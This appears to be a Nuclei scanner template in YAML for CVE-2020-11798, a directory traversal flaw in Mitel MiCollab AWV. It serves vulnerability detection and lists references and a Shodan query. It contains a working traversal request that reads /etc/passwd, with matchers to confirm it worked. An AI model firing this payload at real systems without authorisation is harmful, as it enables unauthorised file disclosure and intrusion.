57 lines
2.5 KiB
YAML
57 lines
2.5 KiB
YAML
id: CVE-2020-11798
|
|
|
|
info:
|
|
name: Mitel MiCollab AWV 8.1.2.4 and 9.1.3 - Directory Traversal
|
|
author: ritikchaddha
|
|
severity: medium
|
|
description: |
|
|
A Directory Traversal vulnerability in the web conference component of Mitel MiCollab AWV before 8.1.2.4 and 9.x before 9.1.3 could allow an attacker to access arbitrary files from restricted directories of the server via a crafted URL, due to insufficient access validation. A successful exploit could allow an attacker to access sensitive information from the restricted directories.
|
|
impact: |
|
|
An attacker can exploit this vulnerability to view, modify, or delete arbitrary files on the system, potentially leading to unauthorized access or data leakage.
|
|
remediation: |
|
|
Apply the latest security patches or updates provided by Mitel to mitigate the vulnerability and prevent unauthorized access.
|
|
reference:
|
|
- https://packetstormsecurity.com/files/171751/mma913-traversallfi.txt
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2020-11798
|
|
- http://packetstormsecurity.com/files/171751/Mitel-MiCollab-AWV-8.1.2.4-9.1.3-Directory-Traversal-LFI.html
|
|
- https://www.mitel.com/-/media/mitel/file/pdf/support/security-advisories/security-bulletin-20-0005-01.pdf
|
|
- https://www.mitel.com/support/security-advisories/mitel-product-security-advisory-20-0005
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
|
|
cvss-score: 5.3
|
|
cve-id: CVE-2020-11798
|
|
cwe-id: CWE-22
|
|
epss-score: 0.82302
|
|
epss-percentile: 0.98125
|
|
cpe: cpe:2.3:a:mitel:micollab_audio\,_web_\&_video_conferencing:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
vendor: mitel
|
|
product: micollab_audio\,_web_\&_video_conferencing
|
|
shodan-query: html:"Mitel" html:"MiCollab"
|
|
tags: packetstorm,cve,cve2020,mitel,micollab,lfi
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/awcuser/cgi-bin/vcs_access_file.cgi?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f/etc/passwd"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: regex
|
|
part: body
|
|
regex:
|
|
- "root:.*:0:0:"
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- application/x-download
|
|
- filename=passwd
|
|
condition: and
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4a0a00473045022100a14c9746bd7d670e36221165220068f7cd320621aeb459d7c3a834f2558f14110220431529708cb04257aa9e7515329656cb239cf8fd0d73b736ce5d91270af130c1:922c64590222798bb761d5b6d8e72950 |